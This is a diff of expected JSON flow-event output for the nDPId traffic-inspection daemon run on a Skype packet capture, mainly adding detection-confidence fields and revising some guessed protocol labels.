+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00596{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
